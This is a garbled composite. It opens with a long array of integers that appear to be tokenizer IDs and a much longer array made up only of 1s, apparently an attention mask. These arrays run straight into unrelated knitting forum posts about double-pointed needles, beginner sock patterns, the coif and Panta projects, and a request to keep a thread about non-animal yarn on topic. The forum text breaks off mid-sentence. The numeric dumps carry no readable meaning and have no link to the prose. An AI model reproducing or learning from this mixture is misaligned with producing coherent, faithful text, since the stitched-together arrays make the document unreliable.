29889, 13, 13, 29902, 29915, 29885, 3063, 304, 1207, 6958, 411, 1906, 1058, 1795, 671, 590, 19911, 29889, 13, 13, 29902, 505, 385, 286, 29899, 18494, 10426, 758, 21332, 21242, 491, 278, 16147, 866, 3049, 983, 29871, 29906, 29900, 29946, 29896, 1028, 2148, 6073, 20710, 4870, 29889, 22096, 304, 29871, 29896, 29945, 29914, 29946, 29914, 29900, 29953, 29892, 306, 29915, 29881, 1304, 263, 1383, 545, 1560, 29899, 29945, 29947, 393, 3734, 263, 20346, 1999, 579, 304, 6036, 263, 6047, 470, 278, 7463, 20710, 310, 590, 26552, 527, 562, 29892, 607, 756, 263, 6584, 305, 749, 304, 16867, 590, 16172, 292, 29889, 306, 884, 1304, 263, 22990, 262, 372, 6472, 29892, 2745, 278, 7881, 25617, 592, 372, 471, 451, 25508, 590, 24242, 408, 1532, 408, 278, 916, 286, 1199, 29889, 13, 13, 29902, 626, 263, 399, 5385, 322, 385, 14882, 1848, 5792, 1920, 11665, 313, 29903, 381, 29892, 825, 29915, 29879, 278, 10039, 29973, 467, 306, 763, 304, 1809, 29892, 2534, 694, 11395, 284, 24242, 313, 29883, 6735, 1584, 3711, 29886, 297, 931, 29892, 322, 4874, 29892, 306, 29915, 29885, 9543, 23623, 28042, 8519, 704, 1217, 29916, 2738, 467, 13, 13, 29902, 505, 8560, 278, 10996, 304, 2664, 341, 7608, 1849, 1434, 385, 20026, 310, 29871, 29945, 29900, 29900, 29889, 306, 505, 884, 269, 686, 1434, 263, 2788, 20026, 313, 18082, 1237, 29892, 11825, 29897, 7697, 2187, 310, 525, 29902, 2811, 29915, 313, 3629, 271, 793, 511, 525, 20335, 315, 26025, 29915, 313, 29967, 265, 478, 9477, 275, 29897, 322, 525, 29902, 626, 9870, 29915, 313, 2008, 1416, 414, 467, 2567, 306, 16508, 1790, 6351, 1363, 278, 20026, 298, 1078, 592, 6317 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
To get my bearings with DPNs, I made two iPod cozies - they're quick, only took an afternoon, and can get you ready to attempt larger projects knitted with them. I used a pattern that I bought at a local LYS for beginning socks from Knitting Pure and Simple. For me, the hardest part about sock knitting was not freaking out about the DPNs. Turning the heel just magically happened when I followed the pattern. You just need to trust the pattern! If you want to start socks, I do recommend the Knitting Pure and Simple Beginner Sock Pattern (not free - only available through yarn shops, but it was totally worth it for me). But before you jump in, learn these basic things: I don't know what other skills different sock patterns use, but these 5 were sufficient for the socks I made. None of these techniques are all that difficult, but it might be overwhelming to learn all or most of them in one project. Take an afternoon, some practice yarn, and visit http://www.knittinghelp.com and you should be fine. She even shows how to turn a basic heel and get started on the gusset in one of the videos. I made the shocking pink coif from knitty for my first non-scarf thing, and it was very straight forward! It's quick, rewarding, and teaches you increases, decreases and i-cord without stress. Definitely good skills to have! Free pattern here: http://www.knitty.com/ISSUEspring03/PATTcoif.html After that, I made the Panta with leftover yarn from the coif. The pattern is always floating around on the first or second page of completed projects. That's great for increases, decreases, and ribbing. After those two projects, I was game for socks! They turned out fine! Now I'm going to make a quick knitted t-shirt. Maybe those two patterns will give you all a similar boost in knitting confidence. And both are nice to have around, for those of us "enjoying" a cold winter right now... I'm not one to stifle a good discussion, but is this thread really the best place for a debate on whether animal yarns are humane or not? Robyn asked, Quote Does anyone have suggestions for non-animal yarn that knits well and looks great, I am trying to expand my horizons. All she is looking for is some yarn advice. If she had noted allergies as her reason for not wanting to use wool, no one would have tried to convince her that she's not really allergic, or that she's just misinformed, or that wool from company 